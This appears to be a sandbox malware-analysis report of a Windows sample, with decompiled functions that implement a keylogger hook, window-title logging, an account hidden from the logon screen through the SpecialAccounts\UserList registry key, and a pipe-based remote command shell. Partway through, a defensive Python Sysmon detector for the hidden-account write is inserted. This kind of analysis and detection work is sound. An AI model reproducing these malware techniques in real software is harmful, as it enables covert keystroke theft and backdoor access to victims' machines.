                                  • Opcode Fuzzy Hash: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                  • Instruction Fuzzy Hash: 5931AE71C42118BBCB10AFA0DC48EDEBB7CEF44315F1040AAF909E2250D7785A95CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00407F94(void* __edx, void* __eflags) {
                                  				short _v176;
                                  				struct tagMSG _v204;
                                  				void* _v208;
                                  				struct _SYSTEMTIME _v228;
                                  				struct HINSTANCE__* _t19;
                                  				intOrPtr _t22;
                                  				intOrPtr _t25;
                                  				intOrPtr _t27;
                                  				intOrPtr _t40;
                                  				intOrPtr _t45;
                                  				void* _t46;
                                  				void* _t49;
                                  				intOrPtr* _t50;
                                  				void* _t59;
                                  				struct HINSTANCE__* _t60;
                                  				intOrPtr _t62;
                                  				intOrPtr _t64;
                                  				intOrPtr _t66;
                                  				void* _t68;
                                  				void* _t71;
                                  				void* _t75;
                                  				void* _t79;
                                  				void* _t90;
                                  
                                  				_t90 = __eflags;
                                  				_t71 = __edx;
                                  				_t19 = GetModuleHandleA(0);
                                  				_t62 =  *0x42675c; // 0x0
                                  				_t60 = _t19;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				E00401052(_t62 + 0x210, 0, 0x800);
                                  				_t22 =  *0x42675c; // 0x0
                                  				E00401052(_t22 + 0x10, 0, 0x208);
                                  				_t25 =  *0x42675c; // 0x0
                                  				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
                                  				_t27 =  *0x42675c; // 0x0
                                  				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
                                  				GetLocalTime( &_v228);
                                  				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
                                  				_t40 =  *0x42675c; // 0x0
                                  				lstrcatW(_t40 + 0x10,  &_v176);
                                  				_t64 =  *0x42675c; // 0x0
                                  				_t11 = _t64 + 0x10; // 0x10
                                  				E00403411(_t64 + 0xc, _t71, _t11);
                                  				_t45 =  *0x42675c; // 0x0
                                  				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
                                  				_t66 =  *0x42675c; // 0x0
                                  				 *(_t66 + 4) = _t46;
                                  				CloseHandle(_t46);
                                  				_v228.wYear = 0;
                                  				_t68 = E004134A2("c:\\windows\\system32\\user32.dll",  &_v228);
                                  				_t49 = E00411EF1(_t68, 0, _t90);
                                  				_t91 = _t49;
                                  				if(_t49 == 0) {
                                  					_t50 =  *0x426758; // 0x0
                                  				} else {
                                  					_push(_t68);
                                  					_t50 = E00411E88(_t49, "SetWindowsHookExA", _t91);
                                  					 *0x426758 = _t50;
                                  				}
                                  				 *_t50(0xd, E00408125, _t60, 0);
                                  				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
                                  					TranslateMessage( &_v204);
                                  					DispatchMessageA( &_v204);
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00407FA5
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 00407FF9
                                  • lstrcatW.KERNEL32 ref: 00408013
                                  • GetLocalTime.KERNEL32(?), ref: 0040801A
                                  • wsprintfW.USER32 ref: 0040804E
                                  • lstrcatW.KERNEL32 ref: 00408065
                                  • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00408091
                                  • CloseHandle.KERNEL32(00000000), ref: 004080A1
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 00411EF1: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,7671826E,00000000,?,?,?,?,004080C2), ref: 00411F1D
                                  • GetMessageA.USER32 ref: 00408114
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  • TranslateMessage.USER32 ref: 004080FB
                                  • DispatchMessageA.USER32 ref: 00408106
                                  Strings
                                  • c:\windows\system32\user32.dll, xrefs: 004080AF
                                  • \Microsoft Vision\, xrefs: 0040800D
                                  • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00408048
                                  • SetWindowsHookExA, xrefs: 004080C7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                  • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                  • API String ID: 1431388325-3884914687
                                  • Opcode ID: 093a974022d1a904e5827a257d604a30f6b30379d0845092852edf74ba7b4546
                                  • Instruction ID: 6c2511fb03697e5af89a4dd955d9eabc72836af2c0e76f94d97bcee5e6e5c3d3
                                  • Opcode Fuzzy Hash: 093a974022d1a904e5827a257d604a30f6b30379d0845092852edf74ba7b4546
                                  • Instruction Fuzzy Hash: 15418271604300ABD3209BA9EC49FAB77ECEBC8748F00486EFA45D3291DA79D945C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004085CB(void* __ecx, void* __edx, void* __eflags) {
                                  				struct _SECURITY_ATTRIBUTES* _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				short _v536;
                                  				int _t35;
                                  				intOrPtr _t37;
                                  				int _t39;
                                  				intOrPtr _t40;
                                  				WCHAR* _t41;
                                  				intOrPtr _t43;
                                  				void* _t44;
                                  				int _t46;
                                  				intOrPtr _t48;
                                  				intOrPtr _t50;
                                  				long _t54;
                                  				intOrPtr _t55;
                                  				intOrPtr _t57;
                                  				void* _t59;
                                  				intOrPtr _t61;
                                  				intOrPtr _t63;
                                  				long _t65;
                                  				intOrPtr _t66;
                                  				void* _t70;
                                  				void* _t73;
                                  				intOrPtr _t83;
                                  				void* _t94;
                                  				void* _t97;
                                  				void* _t98;
                                  				void* _t100;
                                  
                                  				_t94 = __edx;
                                  				_v16 = __ecx;
                                  				E00401052( &_v536, 0, 0x208);
                                  				_v8 = 0;
                                  				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
                                  				_t106 = _t35;
                                  				if(_t35 <= 0) {
                                  					E00403411( &_v8, _t94, L"{Unknown}");
                                  				} else {
                                  					_t73 = E004036F7( &_v12,  &_v536);
                                  					E00403447(E0040357C( &_v8, _t94, _t106, "{"), _t106, _t73);
                                  					E0040357C(_t74, _t94, _t106, "}");
                                  					E00405FEB(_v12);
                                  					_v12 = 0;
                                  				}
                                  				_t37 =  *0x42675c; // 0x0
                                  				_t39 = lstrlenW(_t37 + 0x210);
                                  				_t40 =  *0x42675c; // 0x0
                                  				if(_t39 == 0) {
                                  					L6:
                                  					_t41 = _t40 + 0x210;
                                  					__eflags = _t41;
                                  					lstrcpyW(_t41, _v8);
                                  					_t43 =  *0x42675c; // 0x0
                                  					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
                                  				} else {
                                  					_t70 = E0040335A( &_v8, E004036F7( &_v12, _t40 + 0x210));
                                  					E00405FEB(_v12);
                                  					_t40 =  *0x42675c; // 0x0
                                  					_v12 = 0;
                                  					if(_t70 == 0) {
                                  						goto L6;
                                  					} else {
                                  						 *(_t40 + 0xa10) = 1;
                                  					}
                                  				}
                                  				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
                                  				_t83 =  *0x42675c; // 0x0
                                  				 *(_t83 + 4) = _t44;
                                  				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
                                  					_t21 = _t83 + 8; // 0x8
                                  					_t98 = L"\r\n";
                                  					_t54 = lstrlenW(_t98);
                                  					_t55 =  *0x42675c; // 0x0
                                  					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
                                  					_t57 =  *0x42675c; // 0x0
                                  					_t59 = E00403373( &_v8);
                                  					_t61 =  *0x42675c; // 0x0
                                  					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
                                  					_t63 =  *0x42675c; // 0x0
                                  					_t100 = L"\r\n";
                                  					_t65 = lstrlenW(_t100);
                                  					_t66 =  *0x42675c; // 0x0
                                  					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
                                  					_t83 =  *0x42675c; // 0x0
                                  				}
                                  				_t97 = _v16;
                                  				_t28 = _t83 + 8; // 0x8
                                  				_t46 = lstrlenW(_t97);
                                  				_t48 =  *0x42675c; // 0x0
                                  				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
                                  				_t50 =  *0x42675c; // 0x0
                                  				CloseHandle( *(_t50 + 4));
                                  				return E00405FEB(_v8);
                                  			}

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 004085F4
                                  • GetWindowTextW.USER32 ref: 00408607
                                  • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                  • lstrcpyW.KERNEL32(-00000210,?), ref: 004086BD
                                  • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 004086DE
                                  • lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                  • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                  • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00408737
                                  • lstrlenW.KERNEL32(00417A60,-00000008,00000000,?,?), ref: 0040874A
                                  • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408756
                                  • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00408768
                                  • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00408776
                                  • CloseHandle.KERNEL32(?), ref: 00408780
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                  • String ID: {Unknown}
                                  • API String ID: 2314120260-4054869793
                                  • Opcode ID: bf71ca2cd19c38ae2d5616af0708c008d237dd3c4e3b8dbe04f20a6eaa9f76bc
                                  • Instruction ID: 21f225d70ee6afc1dcb4dd19440159f35fb949404d55de6ac3cc6466c0fc773e
                                  • Opcode Fuzzy Hash: bf71ca2cd19c38ae2d5616af0708c008d237dd3c4e3b8dbe04f20a6eaa9f76bc
                                  • Instruction Fuzzy Hash: EF515F71A40208AFC710EB55DC89FDE7BB9EF44348F0580BAB905A72A1DB759E41CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040E29A(void* __edx, char _a4, char _a8) {
                                  				void* _v12;
                                  				char _v16;
                                  				int _v20;
                                  				char _v36;
                                  				void _v44;
                                  				void* _t51;
                                  				int _t56;
                                  				int _t70;
                                  				void* _t104;
                                  				signed int _t115;
                                  				void* _t161;
                                  				void* _t162;
                                  				void* _t163;
                                  				int _t172;
                                  
                                  				_t161 = __edx;
                                  				InitializeCriticalSection( &_v44);
                                  				_t115 = 6;
                                  				DeleteCriticalSection(memcpy(0x55ad18,  &_v44, _t115 << 2));
                                  				EnterCriticalSection(0x55ad18);
                                  				_t167 = _a4;
                                  				_t111 = _a8;
                                  				 *0x55ad7c = _a4;
                                  				 *0x55ad70 = 0x559cc0;
                                  				 *0x55ad6c = _a8;
                                  				if(E0040DCBF(_t161) == 0) {
                                  					_t51 = E00410A3C();
                                  					__eflags = _t51 - 6;
                                  					if(_t51 < 6) {
                                  						L14:
                                  						E00405044(_t167, E00404C5E( &_v36, 2, 0x55ad74, 0x55ad78));
                                  						E00404C3B( &_v36);
                                  						LeaveCriticalSection(0x55ad18);
                                  						__eflags = 0;
                                  						return 0;
                                  					}
                                  					_t56 = E004109ED();
                                  					__eflags = _t56;
                                  					if(_t56 != 0) {
                                  						goto L14;
                                  					}
                                  					__eflags = E0041111B() - 1;
                                  					if(__eflags == 0) {
                                  						_t162 = 8;
                                  						E00403549(0x55ad74, E004035B9( &_a4, _t162, __eflags));
                                  						E00405FEB(_a4);
                                  						_t163 = 8;
                                  						E00403549(0x55ad78, E004035B9( &_a4, _t163, __eflags));
                                  						E00405FEB(_a4);
                                  						_t172 = 0;
                                  						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
                                  						_v16 = 0;
                                  						RegSetValueExW(_v12,  *0x55ad74, 0, 4,  &_v16, 4);
                                  						RegCloseKey(_v12);
                                  						_t70 = E0040D2B8(0x55ad74, 0x55ad78);
                                  						__eflags = _t70;
                                  						if(_t70 != 0) {
                                  							E00412C34(_a8, _t163, E004036F7( &_a4, L"rudp"), 0x55ad74);
                                  							E00405FEB(_a4);
                                  							E00412C34(_a8, _t163, E004036F7( &_a8, L"rpdp"), 0x55ad78);
                                  							E00405FEB(_a8);
                                  							E00401F6D(0x55ad30, E0040E187, 0x55ad18);
                                  							LeaveCriticalSection(0x55ad18);
                                  							return 1;
                                  						}
                                  						E00405044(_t167, E00404C5E( &_v36, 9, 0x55ad74, 0x55ad78));
                                  						E00404C3B( &_v36);
                                  						L12:
                                  						LeaveCriticalSection(0x55ad18);
                                  						return _t172;
                                  					}
                                  					E00405044(_t167, E00404C5E( &_v36, 1, 0x55ad74, 0x55ad78));
                                  					E00404C3B( &_v36);
                                  					_t172 = 0;
                                  					goto L12;
                                  				}
                                  				E00403549(0x55ad74, E00412C67(_t111, _t161,  &_a8, E004036F7( &_a4, L"rudp")));
                                  				E00405FEB(_a8);
                                  				_a8 = 0;
                                  				E00405FEB(_a4);
                                  				E00403549(0x55ad78, E00412C67(_t111, _t161,  &_a8, E004036F7( &_a4, L"rpdp")));
                                  				E00405FEB(_a8);
                                  				_a8 = 0;
                                  				E00405FEB(_a4);
                                  				if(E00403373(0x55ad74) != 0 || E00403373(0x55ad78) != 0) {
                                  					E00405044(_t167, E00404C5E( &_v36, 8, 0x55ad74, 0x55ad78));
                                  					E00404C3B( &_v36);
                                  				} else {
                                  					_t104 = E004036F7( &_a4, 0x417668);
                                  					E00405044(_t167, E00404C5E( &_v36, 8, E004036F7( &_a8, 0x417668), _t104));
                                  					E00404C3B( &_v36);
                                  					E00405FEB(_a8);
                                  					_a8 = 0;
                                  					E00405FEB(_a4);
                                  				}
                                  				_t172 = 1;
                                  				goto L12;
                                  			}
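The registry write in the listing above is the whole hiding mechanism: a REG_DWORD 0 named after the account under Winlogon\SpecialAccounts\UserList drops that account from the logon and user-switch UI while it stays usable for network and RDP logons. The Python below is an added example, not code from the sandbox report or from the sample. It parses Sysmon Event ID 13 (RegistryEvent, value set) records and flags exactly that write, and on a Windows host it can also read the key directly. The three event records, the account name and the image paths in it are constructed; the Sysmon field names and the "DWORD (0x........)" rendering of the Details field are Sysmon's own.

```python
"""Flag registry writes that hide a local account from the Windows logon UI.
Added example, not code from the sandbox report or the sample: parses Sysmon
Event ID 13 records and reports a REG_DWORD 0 written under SpecialAccounts\\UserList,
the write the decompiled function above makes. All events below are constructed."""
import re
import sys
import xml.etree.ElementTree as ET

USERLIST_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# TargetObject is "HKLM\<key>\<value name>"; the value name is the account being hidden.
_USERLIST_RE = re.compile(r"^HKLM\\" + re.escape(USERLIST_KEY) + r"\\([^\\]+)$", re.IGNORECASE)
# Sysmon renders REG_DWORD data in the Details field as "DWORD (0x00000000)".
_DWORD_RE = re.compile(r"^DWORD \(0x([0-9A-Fa-f]{8})\)$")


def _event(target, details, image, event_id=13):
    """Build one event in the XML shape the Windows event log exports (constructed test data)."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        f"<System><EventID>{event_id}</EventID></System><EventData>"
        '<Data Name="EventType">SetValue</Data>'
        f'<Data Name="Image">{image}</Data>'
        f'<Data Name="TargetObject">{target}</Data>'
        f'<Data Name="Details">{details}</Data>'
        "</EventData></Event>"
    )


# Constructed sample batch: one hide, one unhide, one unrelated Run-key write.
SAMPLE_EVENTS = [
    _event(r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\hbjqkmzt",
           "DWORD (0x00000000)", r"C:\Users\user\AppData\Roaming\sample.exe"),
    _event(r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administrator",
           "DWORD (0x00000001)", r"C:\Windows\regedit.exe"),
    _event(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
           r"C:\Users\user\AppData\Roaming\sample.exe", r"C:\Users\user\AppData\Roaming\sample.exe"),
]


def parse_event(xml_text):
    """Return EventID plus every EventData field as a flat dict."""
    root = ET.fromstring(xml_text)
    event = {"EventID": int(root.findtext("e:System/e:EventID", namespaces=EVENT_NS))}
    for data in root.findall("e:EventData/e:Data", EVENT_NS):
        event[data.get("Name")] = data.text or ""
    return event


def hidden_account(event):
    """Name of the account this event hides, or None. Only a DWORD 0 directly under
    UserList counts; writing 1 (unhide) or a non-DWORD value is ignored."""
    if event.get("EventID") != 13:
        return None
    key_match = _USERLIST_RE.match(event.get("TargetObject", ""))
    data_match = _DWORD_RE.match(event.get("Details", ""))
    if not key_match or not data_match or int(data_match.group(1), 16) != 0:
        return None
    return key_match.group(1)


def find_hidden_accounts(xml_events):
    """(account, writing process) for every hide event in the batch."""
    hits = []
    for xml_text in xml_events:
        event = parse_event(xml_text)
        name = hidden_account(event)
        if name is not None:
            hits.append((name, event.get("Image", "")))
    return hits


def live_hidden_accounts():
    """On a Windows host, read the key itself and list accounts whose DWORD is 0;
    elsewhere, or if the key does not exist, return an empty list."""
    if sys.platform != "win32":
        return []
    import winreg
    hidden = []
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, USERLIST_KEY) as key:
            index = 0
            while True:
                try:
                    name, value, value_type = winreg.EnumValue(key, index)
                except OSError:          # ERROR_NO_MORE_ITEMS ends the enumeration
                    break
                if value_type == winreg.REG_DWORD and value == 0:
                    hidden.append(name)
                index += 1
    except FileNotFoundError:
        pass
    return hidden


if __name__ == "__main__":
    for account, image in find_hidden_accounts(SAMPLE_EVENTS):
        print(f"account hidden from logon UI: {account} (written by {image})")
```

The key lookup is anchored to the value directly under UserList and the data to a zero DWORD, so an administrator re-enabling an account (DWORD 1) or a write to some other Winlogon value does not fire; pair the Sysmon rule with live_hidden_accounts() when triaging a host, because the sample's write happens once and may predate log retention.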

















                                  Address column for the listing above: 0x0040e29a to 0x0040e59a

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040E2A7
                                  • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040E2BE
                                  • EnterCriticalSection.KERNEL32(0055AD18,?,?), ref: 0040E2CA
                                    • Part of subcall function 0040DCBF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                  • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0040E49F
                                  • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0040E4BA
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 0040E4C3
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,0055AD74,0055AD78,?,?), ref: 0040E4FE
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,rpdp,0055AD78,00000000,rudp,0055AD74,0055AD74,0055AD78,?,?), ref: 0040E564
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,?,?), ref: 0040E594
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                  • API String ID: 2046459734-177601018
                                  • Opcode ID: 720f5ae610a3ef8cd572fadb057d6beb279a60b014ea6f1222e20c7c0974c690
                                  • Instruction ID: 0a479e188c8e80083ad3493b7ec29c52a1503be388f48136fafe1c7c6f2d3922
                                  • Opcode Fuzzy Hash: 720f5ae610a3ef8cd572fadb057d6beb279a60b014ea6f1222e20c7c0974c690
                                  • Instruction Fuzzy Hash: 1B7192706005187ACB05BB62CC62EEE7B78EF4431AB00453FB906B62D2DB3C5A45CA99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041001A(void* __eflags, char _a4) {
                                  				void* _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				void* _v20;
                                  				void* _v24;
                                  				struct _SECURITY_ATTRIBUTES _v36;
                                  				void* _t54;
                                  				void* _t61;
                                  				void* _t64;
                                  				int _t66;
                                  				void* _t76;
                                  				int _t94;
                                  				void* _t95;
                                  
				E0040FFA8(0x426608);   // shut down any earlier session first (subcall: SetEvent, WaitForSingleObject on the thread at 0x42661c for 0x1388 = 5 s, then TerminateThread)
                                  				_v12 = _v12 & 0x00000000;
                                  				_v16 = _v16 & 0x00000000;
                                  				_v8 = _v8 & 0x00000000;
                                  				_t94 = 1;
                                  				_v20 = _v20 & 0x00000000;
                                  				_v24 = _v24 & 0x00000000;
				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
				_v36.nLength = 0xc;
				_v36.bInheritHandle = 1;   // pipe ends are created inheritable so the child process can use them as its standard handles
				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {   // pipe 1: _v12 = read end, _v8 = write end
                                  					L7:
                                  					E004101AB( &_v12);
                                  					E004101AB( &_v8);
                                  					E004101AB( &_v16);
                                  					E004101AB( &_v20);
                                  					E004101AB( &_v24);
                                  					E0040FFA8(0x426608);
                                  					_t94 = 0;
                                  				} else {
					_t54 = GetCurrentProcess();
					// inheritable duplicate (bInheritHandle = 1, DUPLICATE_SAME_ACCESS = 2) of pipe 1's write end into _v16, then pipe 2: _v24 = read end, _v20 = write end
					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
                                  						goto L7;
                                  					} else {
                                  						_t61 = GetCurrentProcess();
						// non-inheritable copy of pipe 1's read end kept in the global at 0x426610: the parent's side for reading what the child writes
						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x426610, 0, 0, 2) == 0) {
                                  							goto L7;
                                  						} else {
                                  							_t64 = GetCurrentProcess();
							// non-inheritable copy of pipe 2's write end kept at 0x426614: the parent's side for feeding the child's input
							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x426614, 0, 0, 2);
                                  							_t101 = _t66;
                                  							if(_t66 == 0) {
                                  								goto L7;
                                  							} else {
								E004101AB( &_v12);   // the inheritable originals of the parent-side ends are closed so only the child-side ends are inherited
								E004101AB( &_v20);
								E0040373F(_t95,  &_a4);
								// subcall 0040FDB0 is CreateProcessW with bInheritHandles = 1; _v8, _v24 and _v16 are the child-side pipe ends it is handed
								if(E0040FDB0(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
                                  									goto L7;
                                  								} else {
									E004101AB( &_v8);     // the child now holds its ends, so the parent's copies of them are released
									E004101AB( &_v24);
									E004101AB( &_v16);
									 *0x426618 = CreateEventA(0, 1, 0, 0);   // manual-reset stop event, the one 0040FFA8 signals on teardown
									_t76 = CreateThread(0, 0, E0040FE49, 0x426608, 0, 0x426620);   // worker thread started on the session context at 0x426608; its handle lands in 0x42661c
                                  									 *0x42661c = _t76;
                                  									if(_t76 == 0) {
                                  										goto L7;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				E00405FEB(_a4);
                                  				return _t94;
                                  			}
















                                  Address column for the listing above: 0x00410028 to 0x004101a8

                                  APIs
                                    • Part of subcall function 0040FFA8: GetCurrentThreadId.KERNEL32(?,00000000,00402BC7,00000000,exit,00000000,start), ref: 0040FFB4
                                    • Part of subcall function 0040FFA8: SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                    • Part of subcall function 0040FFA8: WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                    • Part of subcall function 0040FFA8: TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                  • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 00410060
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0041007D
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 00410083
                                  • DuplicateHandle.KERNEL32 ref: 0041008C
                                  • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 004100A4
                                  • GetCurrentProcess.KERNEL32(00426610,00000000,00000000,00000002,?,00000000), ref: 004100BD
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100C3
                                  • DuplicateHandle.KERNEL32 ref: 004100C6
                                  • GetCurrentProcess.KERNEL32(00426614,00000000,00000000,00000002,?,00000000), ref: 004100DB
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100E1
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00410137
                                  • CreateThread.KERNEL32(00000000,00000000,0040FE49,00426608,00000000,00426620), ref: 00410157
                                  • DuplicateHandle.KERNEL32 ref: 004100E4
                                    • Part of subcall function 004101AB: CloseHandle.KERNEL32(00426618), ref: 004101B5
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040FDB0: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0040FE02
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                  • String ID:
                                  • API String ID: 337272696-0
                                  • Opcode ID: 476275841dcc2ec4d27dac76c17dce4c31d1fe2d653be3a7ca774bd162a6705e
                                  • Instruction ID: 45800abd4bc58874337c2637046ca9fcf03b4e80ac058ab55fe317e8ad8503fa
                                  • Opcode Fuzzy Hash: 476275841dcc2ec4d27dac76c17dce4c31d1fe2d653be3a7ca774bd162a6705e
                                  • Instruction Fuzzy Hash: B4416571A40259BBEF10EBA1DC46FEF7B78AF04704F50457AB101B21D1DBBD9A84CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D42D(struct _QUERY_SERVICE_CONFIG* _a4) {
                                  				int _v8;
                                  				void* __ecx;
